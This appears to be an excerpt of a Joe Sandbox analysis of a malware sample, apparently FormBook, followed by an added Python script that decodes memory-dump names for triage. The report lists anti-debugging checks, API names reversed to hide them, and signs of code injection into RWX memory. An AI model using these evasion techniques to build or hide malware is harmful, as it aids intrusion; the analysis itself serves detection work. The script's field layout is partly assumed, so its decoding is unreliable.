• Instruction Fuzzy Hash: 54018F74690208BFEB06EBA8D991A9EBBAEEF4D750F518860B40497641CF74A900CA20

Control-flow Graph

APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02AB8660
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressCreateHandleModuleProcProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 4105707577-2353454454
• Opcode ID: caf8a1f1e871f7b8847ad5de689900fc61ad308b6a3fa26a587cef643ad0fa15
• Instruction ID: 535579cbfa2b60b2669ee6ee21b8d3b6bbf1cd0bc1e38413f8a77ecdbceda8f0
• Opcode Fuzzy Hash: caf8a1f1e871f7b8847ad5de689900fc61ad308b6a3fa26a587cef643ad0fa15
• Instruction Fuzzy Hash: 811103B6640208BFDB42EEACDD91FDA3BEDEF0C740F518410BA08D3641CA78E9108B60

Control-flow Graph

APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• WinExec.KERNEL32(?,?), ref: 02AB8470
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressExecHandleModuleProc
• String ID: Kernel32$WinExec
• API String ID: 3450258509-3609268280
• Opcode ID: 025f2ce470c8d855fe6b162ee75c3e5c503649eb3c9d2d7824f0d0e7dbb225b2
• Instruction ID: a25fdc2ea563c28d0b0cda3567980af6ed7b0636f57eddf90c657f7942c67a8c
• Opcode Fuzzy Hash: 025f2ce470c8d855fe6b162ee75c3e5c503649eb3c9d2d7824f0d0e7dbb225b2
• Instruction Fuzzy Hash: 95016D35694204BFEB06EAA8DD51B9A7BEDEF48710F518420B504D7A41DA78AD10CA20

Control-flow Graph

APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• WinExec.KERNEL32(?,?), ref: 02AB8470
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressExecHandleModuleProc
• String ID: Kernel32$WinExec
• API String ID: 3450258509-3609268280
• Opcode ID: 51995c02505acc6ecacd5f1e4be011e126b9561e49d96775112e5401f76e5d9f
• Instruction ID: 5c46304f084d577a54cb11779f2cfb567ceb26df4c939366e8497719d039f3fb
• Opcode Fuzzy Hash: 51995c02505acc6ecacd5f1e4be011e126b9561e49d96775112e5401f76e5d9f
• Instruction Fuzzy Hash: E6F08135694204BFEB06EFA8DD51B9A7BEDFF4C710F51C420B504D7A41DE78A910CA20

Control-flow Graph

APIs
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02ABEC21
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 3662101638-539270669
• Opcode ID: 966353bb8c7356d6871318431cc750284624ae1b06499efb30f809bc8fa3e600
• Instruction ID: 8478525508e8e40a62b1a2928b871f38f1186d8e91aec8acb3f7817ea1c57f4d
• Opcode Fuzzy Hash: 966353bb8c7356d6871318431cc750284624ae1b06499efb30f809bc8fa3e600
• Instruction Fuzzy Hash: CCF0A73090424CBEDB13A7A88A897DDFBAD5F0632AFA807949435721C2EF715640C695
APIs
  • Part of subcall function 02AB8018: GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AB820E), ref: 02AB81F0
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressCacheFlushHandleInstructionModuleProc
• String ID: FlushInstructionCache$Kernel32
• API String ID: 2392256011-184458249
• Opcode ID: 2fe5795689543d59ab93637d185d2377fbfbaff3e296e82c96a5443170cd29a1
• Instruction ID: 49ec2ae5df6b7d14927e37fd192c1f3051c07d5ee6ace95b5bd1635812d4d26f
• Opcode Fuzzy Hash: 2fe5795689543d59ab93637d185d2377fbfbaff3e296e82c96a5443170cd29a1
• Instruction Fuzzy Hash: C1018B35A84204BFEB02EFA8DD91F9A77ADEF4CB00F518460B504D3641DA78AD10CA20
APIs
• GetProcAddress.KERNEL32(?,?), ref: 02AB8125
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressProc
• String ID: Kernel32$sserddAcorPteG
• API String ID: 190572456-1372893251
• Opcode ID: 6d089a321635ca2ea5ff20eda783f1eb583c7b6f50cd410fd21804e8c3cbd890
• Instruction ID: 0dfa0601b4a8a7f03a54af0352a72be0118820962c652b06cfe88d14e7ae787d
• Opcode Fuzzy Hash: 6d089a321635ca2ea5ff20eda783f1eb583c7b6f50cd410fd21804e8c3cbd890
• Instruction Fuzzy Hash: 85018434691304BFEB06EBA8D951A9E77AEEF4C700F518460F40497641DF74A900CE10
APIs
  • Part of subcall function 02AB80C0: GetProcAddress.KERNEL32(?,?), ref: 02AB8125
• GetModuleHandleA.KERNELBASE(?), ref: 02AB806A
Strings
Memory Dump Source
• Source File: 00000007.00000002.2375497689.0000000002AA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2aa1000_Tizelcdh.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: AeldnaHeludoMteG$KernelBASE
• API String ID: 1646373207-1952140341
• Opcode ID: 2291515ad5fbea1b81ad82ee6483fc7bb3d57e61177a54464ef24127409b97c5
• Instruction ID: b4a5fd54d9265ab492ddb1234daec7419eeed8cde9f8762049642ef85126f060
• Opcode Fuzzy Hash: 2291515ad5fbea1b81ad82ee6483fc7bb3d57e61177a54464ef24127409b97c5
• Instruction Fuzzy Hash: 92F06231694304BFEB16EBA8DD5199A7BADFF497807518560F40093A01DF74AD10CA60

Execution Graph

Execution Coverage: 0%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 5
Total number of Limit Nodes: 1
execution_graph 82688 1a342b60 LdrInitializeThunk 82691 1a342c00 82693 1a342c0a 82691->82693 82694 1a342c11 82693->82694 82695 1a342c1f LdrInitializeThunk 82693->82695
Strings
Memory Dump Source
• Source File: 0000000B.00000001.2320930525.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: @$B$a```$gfff$gfff$gfff$gfff
• API String ID: 0-3667867154

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 7 1a3435c0-1a3435cc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 4 1a342b60-1a342b6c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 5 1a342c70-1a342c7c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 6 1a342df0-1a342dfc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 1a342c0a-1a342c0f 1 1a342c11-1a342c18 0->1 2 1a342c1f-1a342c26 LdrInitializeThunk 0->2
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 0000000B.00000001.2320930525.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: <$VUUU$^$gfff$gfff$yxxx
• API String ID: 0-316815425

Control-flow Graph

• Executed
• Not Executed
Strings
• CLIENT(ntdll): Processing section info %ws..., xrefs: 1A374787
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1A374725
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1A374742
• ExecuteOptions, xrefs: 1A3746A0
• Execute=1, xrefs: 1A374713
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1A374655
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1A3746FC
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1A3702BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1A3702E7
• RTL: Re-Waiting, xrefs: 1A37031E
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
Strings
• RTL: Resource at %p, xrefs: 1A377B8E
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1A377B7F
• RTL: Re-Waiting, xrefs: 1A377BAC
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1A37728C
Strings
• RTL: Resource at %p, xrefs: 1A3772A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 1A377294
• RTL: Re-Waiting, xrefs: 1A3772C1
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
                                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                    • Instruction ID: 0748c255af16f8db932fd276e3423e662c62ea589b4163afea0a0c80209778bf
                                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                    • Instruction Fuzzy Hash: 2C918F70E1021AABDB16CE69C881BAEB7E5FF45720F71471BE955E72C0E7309981CB60
Memory Dump Source
• Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1a2d0000_hdcleziT.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 5a6c953a180655cf7cd519c4d0720c5f0aebd5e92b53dcc7a7de75e7ec6e05ce
• Instruction ID: 89f36c72e1c48e4db71e99d045bf9be72a9ab53e82c7fd23e8f4c5cb77e56f88
• Opcode Fuzzy Hash: 5a6c953a180655cf7cd519c4d0720c5f0aebd5e92b53dcc7a7de75e7ec6e05ce
• Instruction Fuzzy Hash: D5811775D012699BDB258BA4CD44BDEB6B8AF48710F0141EAE90DF7280E7709E85CFA0
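The "Source File" name above packs the memory region's attributes into its dot-separated fields, and the IDA-plugin snapshot name repeats three of them in decimal/hex. The decoder below is an added example, not Joe Sandbox code. Its field layout (PID, snapshot index, dump id, base address, page protection, state, type, trailing field) is an assumption inferred from the name on this page; only the PID/snapshot/base fields are corroborated by the snapshot file name. The flag names are the standard Win32 memory constants from winnt.h. For this dump it decodes 0x40/0x1000/0x20000 as PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE in PID 11, i.e. a writable, executable, non-image region that nonetheless carries a PE header, which is the memory footprint the process-hollowing and injection signatures in this report describe.

```python
"""Decode Joe Sandbox memory-dump identifiers into the Win32 page attributes they encode.

Added example, not Joe Sandbox code. ASSUMED layout of the .sdmp name:
  PID . snapshot . dump-id . base . protect . state . type . extra . sdmp
(hex fields except dump-id). Only PID/snapshot/base are cross-checked against the
IDA-plugin snapshot name; the flag constants are the real winnt.h values.
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed .sdmp layout: eight dot-separated fields, 64-bit base address.
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp$"
)
# The report line: "Source File: <name>, Offset: <hex>, based on PE: true|false"
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)"
)
# Snapshot name: hcaresult_<pid>_<snapshot>_<base>_<random>.jbxd (pid/snapshot decimal, base hex)
SNAPSHOT_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<snap>\d+)_(?P<base>[0-9A-Fa-f]+)_\w+\.jbxd$")


@dataclass
class DumpInfo:
    pid: int
    snapshot: int
    dump_id: int
    base: int
    protect: int
    state: int
    mem_type: int
    based_on_pe: bool = False

    def protect_name(self) -> str:
        name = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([name] + mods)

    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:x}")

    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_executable(self) -> bool:
        return bool(self.protect & 0xF0)          # PAGE_EXECUTE* bits

    def is_writable(self) -> bool:
        return bool(self.protect & 0xCC)          # READWRITE / WRITECOPY, with or without EXECUTE

    def triage(self) -> list:
        """Heuristics an analyst applies to a dump descriptor before opening it in IDA."""
        notes = []
        if self.is_executable() and self.is_writable():
            notes.append("writable+executable region")
        if self.mem_type == 0x20000 and self.is_executable():
            notes.append("executable private (non-image) memory: no backing file on disk")
        if self.based_on_pe and self.mem_type != 0x1000000:
            notes.append("PE header outside an image mapping: manually mapped / injected module")
        return notes


def parse_sdmp_name(name: str) -> DumpInfo:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return DumpInfo(pid=int(m["pid"], 16), snapshot=int(m["snap"], 16), dump_id=int(m["dump"]),
                    base=int(m["base"], 16), protect=int(m["prot"], 16),
                    state=int(m["state"], 16), mem_type=int(m["type"], 16))


def parse_source_line(line: str) -> DumpInfo:
    """Parse a 'Memory Dump Source' line and verify Offset agrees with the file-name base."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError("not a Memory Dump Source line")
    info = parse_sdmp_name(m["name"])
    if int(m["off"], 16) != info.base:
        raise ValueError("Offset field disagrees with base address in file name")
    info.based_on_pe = m["pe"] == "true"
    return info


def snapshot_matches(info: DumpInfo, snapshot_name: str) -> bool:
    """Cross-check a .jbxd snapshot name against the dump it claims to come from."""
    m = SNAPSHOT_RE.match(snapshot_name)
    return bool(m) and (int(m["pid"]), int(m["snap"]), int(m["base"], 16)) == (info.pid, info.snapshot, info.base)


if __name__ == "__main__":
    # The two identifiers shown on this page.
    line = ("Source File: 0000000B.00000002.2806628363.000000001A2D0000.00000040."
            "00001000.00020000.00000000.sdmp, Offset: 1A2D0000, based on PE: true")
    d = parse_source_line(line)
    print(f"pid={d.pid} snapshot={d.snapshot} base=0x{d.base:X} "
          f"{d.protect_name()} {d.state_name()} {d.type_name()}")
    print(snapshot_matches(d, "hcaresult_11_2_1a2d0000_hdcleziT.jbxd"), d.triage())
```

Run it against other "Source File" lines in the report to sort dumps before opening them: a dump that is MEM_IMAGE with PAGE_EXECUTE_READ is usually just a loaded DLL, while an RWX MEM_PRIVATE dump flagged "based on PE: true", like this one, is where the unpacked FormBook payload is most likely to be.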